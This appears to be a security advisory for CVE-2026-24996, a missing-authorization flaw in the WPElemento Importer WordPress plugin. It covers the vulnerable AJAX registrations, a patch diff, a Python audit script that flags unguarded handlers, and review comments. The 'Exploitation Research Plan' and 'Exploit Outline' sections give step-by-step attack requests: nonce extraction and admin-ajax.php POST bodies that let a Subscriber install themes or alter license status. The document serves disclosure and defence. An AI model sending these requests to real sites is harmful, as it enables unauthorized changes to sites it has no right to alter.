CVE-2026-24996

WPElemento Importer <= 0.6.4 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 4.3
Patched in: 0.6.5
Time to patch: 10d

Description

The WPElemento Importer plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 0.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 0.6.4
Published: January 24, 2026
Last updated: February 2, 2026
Affected plugin: wpelemento-importer

What Changed in the Fix

Changes introduced in v0.6.5


Source Code: WordPress.org SVN

Research Plan (Unverified)


Exploitation Research Plan: CVE-2026-24996 (WPElemento Importer)

1. Vulnerability Summary

The WPElemento Importer plugin (up to 0.6.4) is vulnerable to Missing Authorization in its AJAX handlers. The plugin registers several AJAX actions via the WPElemento_Importer_ThemeWhizzie class in theme-wizard/elemento_exporter_whizzie.php. These actions (registered with wp_ajax_*) are accessible to any authenticated user, including those with Subscriber privileges. Because the handler functions lack internal capability checks (e.g., current_user_can('manage_options')), a Subscriber can perform administrative tasks such as installing/activating themes or modifying plugin license configurations.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Vulnerable Actions:
    • wz_activate_elemento_exporter_pro (Likely used to manipulate license/validation status).
    • wpelemento_importer_install_free_theme (Used to install and activate WordPress themes).
    • setup_plugins (Used to trigger plugin installations via TGMPA).
  • Authentication: Authenticated, Subscriber-level access or higher.
  • Payload Parameters:
    • action: The AJAX action name.
    • theme_slug: (For installation) The slug of the theme to install (e.g., twentytwentyfour).
    • key or license_key: (For license activation) The key to set.
    • _ajax_nonce: The security nonce localized by the plugin.

3. Code Flow

  1. Initialization: plugin.php requires theme-wizard/config.php (Line 46), which instantiates WPElemento_Importer_ThemeWhizzie.
  2. Registration: Inside WPElemento_Importer_ThemeWhizzie::init() (Lines 140-155), AJAX actions are registered:
    add_action('wp_ajax_wpelemento_importer_install_free_theme', array($this, 'wpelemento_importer_install_and_activate_free_theme'));
    add_action('wp_ajax_wz_activate_elemento_exporter_pro', array($this, 'wz_activate_elemento_exporter_pro'));
  3. Execution: When a Subscriber sends a POST request to admin-ajax.php with action=wpelemento_importer_install_free_theme, WordPress executes the callback wpelemento_importer_install_and_activate_free_theme.
  4. Sink: The handler likely performs a theme installation using the Theme_Upgrader class or modifies options like wpelemento_importer_pro_theme_validation_status via static methods (Lines 72-92) without verifying if the user has manage_options capabilities.

4. Nonce Acquisition Strategy

The plugin registers and localizes scripts in enqueue_scripts (Line 166). The nonce is required for the AJAX request.

  1. Check Script Loading: The script theme-wizard-script is registered at Line 189. It is enqueued via admin_enqueue_scripts (Line 116).
  2. Identify JS Variable: Based on the code, the localization variable is likely named wpelemento_importer_setup_wizard_params or wpelementoimporter_wizard_params (derived from $this->plugin_name at Line 132).
  3. Extraction:
    • Log in as a Subscriber.
    • Navigate to /wp-admin/profile.php.
    • Use browser_eval to find the nonce:
      browser_eval("window.wpelementoimporter_wizard_params?.wpnonce || window.wpelemento_importer_params?.nonce")
  4. Action Matching: Note that wp_ajax_ handlers often use the same nonce localized for the wizard. If a nonce check is present, it will likely use the key found in this global object.

5. Exploitation Strategy

We will demonstrate the vulnerability by installing and activating a theme from WordPress.org without the authorization that action normally requires.

Step 1: Extract Nonce

  1. Log in to WordPress as a Subscriber.
  2. Visit /wp-admin/.
  3. Extract the nonce from the localized script data.
    • Variable Name: wpelemento_importer_wizard_params (inferred from $this->plugin_name at Line 132).
    • Key: wpnonce or nonce.

Step 2: Unauthorized Theme Installation

Submit an AJAX request to install a theme (e.g., twentytwentyfour).

  • Method: POST
  • URL: http://<target>/wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=wpelemento_importer_install_free_theme&theme_slug=twentytwentyfour&_ajax_nonce=[NONCE]

Step 3: Unauthorized License Activation (Alternative)

Attempt to change the validation status to "true".

  • Method: POST
  • URL: http://<target>/wp-admin/admin-ajax.php
  • Body:
    action=wz_activate_elemento_exporter_pro&key=VALID_KEY_MOCK&_ajax_nonce=[NONCE]

6. Test Data Setup

  1. A WordPress environment with WPElemento Importer 0.6.4 installed.
  2. A Subscriber user (e.g., attacker / password).
  3. Ensure the theme twentytwentyfour is not currently installed.

7. Expected Results

  • Response: The AJAX request should return a success message (e.g., JSON { "success": true } or a success string).
  • Effect: The theme twentytwentyfour will be downloaded and installed in /wp-content/themes/.
  • Alternative Effect: The option wpelemento_importer_pro_theme_validation_status will be updated to true.

8. Verification Steps

After the HTTP request, verify the impact via WP-CLI:

  1. Check Theme Installation:
    wp theme is-installed twentytwentyfour
  2. Check Pro Validation Status:
    wp option get wpelemento_importer_pro_theme_validation_status
    (Expected: true)
  3. Check Theme Key:
    wp option get wp_pro_theme_key

9. Alternative Approaches

If wpelemento_importer_install_free_theme requires specific theme metadata:

  • Try the wpelemento_importer_setup_elementor action (Line 151) which might trigger Elementor-specific configurations or installations.
  • If the nonce check fails or is missing, try the request without the _ajax_nonce parameter to see if the plugin fails to enforce CSRF protection as well.
  • Check admin_init for wpelemento_importer_handle_free_theme_redirect (Line 141); if this function handles $_GET parameters without authorization, it might be possible to trigger a redirect or option update via a simple GET request.

Research Findings

Static analysis — not yet PoC-verified

Summary

The WPElemento Importer plugin for WordPress is vulnerable to unauthorized access because several AJAX handlers in the WPElemento_Importer_ThemeWhizzie class lack capability checks. This allows authenticated attackers with Subscriber-level access or higher to perform administrative actions such as installing and activating themes, configuring plugins, or manipulating license validation status.

Vulnerable Code

// theme-wizard/elemento_exporter_whizzie.php lines 147-154
        add_action('wp_ajax_setup_plugins', array($this, 'setup_plugins'));
        add_action('wp_ajax_setup_widgets', array($this, 'setup_widgets'));
        add_action('wp_ajax_wpelemento_importer_setup_themes', array($this, 'wpelemento_importer_setup_themes'));
        add_action('wp_ajax_wz_activate_elemento_exporter_pro', array($this, 'wz_activate_elemento_exporter_pro'));
        add_action('wp_ajax_wpelemento_importer_setup_elementor', array($this, 'wpelemento_importer_setup_elementor'));
        add_action('wp_ajax_templates_api_category_wise', array($this, 'wpelemento_importer_pro_templates_api_category_wise'));
        add_action('wp_ajax_wpelemento_importer_install_free_theme', array($this, 'wpelemento_importer_install_and_activate_free_theme'));

---

// theme-wizard/elemento_exporter_whizzie.php lines 1338+
    function wpelemento_importer_setup_elementor() {

      $elemento_themes = $this->get_elemento_themes();
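An added example, not code from the plugin or from this advisory: a small static audit that lists every wp_ajax_ callback registered with the pattern shown above and reports whether its body contains a nonce check (check_ajax_referer or wp_verify_nonce) and a capability check (current_user_can), the two guards the 0.6.5 fix adds. The PHP sample inside it is constructed, modelled on the registration block and handler quoted above, with the second handler deliberately left unguarded to stand in for the pre-fix state.

```python
import re

# Constructed PHP sample modelled on the registrations and handlers quoted above; the second handler is left unguarded.
SAMPLE_PHP = r"""add_action('wp_ajax_wpelemento_importer_setup_elementor', array($this, 'wpelemento_importer_setup_elementor'));
add_action('wp_ajax_wpelemento_importer_install_free_theme', array($this, 'wpelemento_importer_install_and_activate_free_theme'));
function wpelemento_importer_setup_elementor() {
    if (!check_ajax_referer('whizzie_nonce', 'wpnonce', false)) { wp_send_json_error(array('message' => 'Nonce verification failed')); }
    if (!current_user_can('manage_options')) { wp_send_json_error(array('message' => 'Insufficient permissions.')); }
    $elemento_themes = $this->get_elemento_themes();
}
function wpelemento_importer_install_and_activate_free_theme() {
    $slug = sanitize_text_field($_POST['theme_slug']);
    (new Theme_Upgrader())->install("https://downloads.wordpress.org/theme/$slug.zip");
}
"""

# Matches add_action('wp_ajax_<action>', array($this, '<method>')) as written in the plugin's init().
REG_RE = re.compile(r"add_action\(\s*'wp_ajax_(?P<action>\w+)'\s*,\s*array\(\s*\$this\s*,\s*'(?P<fn>\w+)'\s*\)")


def function_body(src, name):
    # Return the brace-delimited body of `function name(...)`, or "" if the function is not defined.
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    if not m or (start := src.find("{", m.end())) < 0:
        return ""
    depth = 0
    for i in range(start, len(src)):
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        if depth == 0:
            return src[start:i + 1]
    return ""


def audit_ajax_handlers(src):
    # Map each registered AJAX action to the guards found in its callback body.
    report = {}
    for m in REG_RE.finditer(src):
        body = function_body(src, m.group("fn"))
        report[m.group("action")] = {
            "handler": m.group("fn"),
            "nonce_check": bool(re.search(r"\b(check_ajax_referer|wp_verify_nonce)\s*\(", body)),
            "capability_check": bool(re.search(r"\bcurrent_user_can\s*\(", body)),
        }
    return report


def missing_authorization(src):
    # Actions whose callback never calls current_user_can(): the CVE-2026-24996 pattern.
    return sorted(a for a, r in audit_ajax_handlers(src).items() if not r["capability_check"])
```

Run it against a real plugin by reading the PHP file into a string and calling missing_authorization(); a nonce check alone does not appear in that list because it is CSRF protection, not authorization.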

Security Fix

--- /home/deploy/wp-safety.org/data/plugin-versions/wpelemento-importer/0.6.4/theme-wizard/elemento_exporter_whizzie.php	2026-01-17 07:27:40.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/wpelemento-importer/0.6.5/theme-wizard/elemento_exporter_whizzie.php	2026-01-20 07:02:36.000000000 +0000
@@ -1336,6 +1336,14 @@
     }
     // this code is for demo elementor importer start //
     function wpelemento_importer_setup_elementor() {
+
+      if (!check_ajax_referer('whizzie_nonce', 'wpnonce', false)) {
+          wp_send_json_error(array('message' => esc_html__('Nonce verification failed', 'wpelemento-importer')));
+      }
+      
+      if (!current_user_can('manage_options')) {
+          wp_send_json_error(array('message' => esc_html__('Insufficient permissions. Administrator access required.', 'wpelemento-importer')));
+      }
 
       $elemento_themes = $this->get_elemento_themes();
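Review bot: this hunk guards only wpelemento_importer_setup_elementor(), while the registration block quoted under Vulnerable Code (lines 147-154) wires six other wp_ajax_ callbacks (setup_plugins, setup_widgets, wpelemento_importer_setup_themes, wz_activate_elemento_exporter_pro, wpelemento_importer_pro_templates_api_category_wise and wpelemento_importer_install_and_activate_free_theme), so each of those needs to be confirmed to carry the same check_ajax_referer() and current_user_can('manage_options') pair; the nonce line is CSRF protection, and it is the capability line that actually closes the missing-authorization finding. Two smaller points: the added line `+      ` is whitespace-only and should be blank, and although wp_send_json_error() terminates the request via wp_die(), an explicit `return;` after each call documents the intent and keeps the guard intact if someone later swaps in a non-terminating response.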

Exploit Outline

To exploit this vulnerability, an attacker first authenticates as a Subscriber and extracts a valid AJAX nonce from the WordPress admin dashboard, typically found in the localized JavaScript object 'wpelemento_importer_wizard_params'. The attacker then sends a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to one of the vulnerable functions, such as 'wpelemento_importer_install_free_theme'. By providing the desired 'theme_slug' and the extracted nonce, the attacker can force the site to install and activate an arbitrary theme from the WordPress repository, bypassing the requirement for administrative privileges because the server fails to verify the user's capabilities before execution.
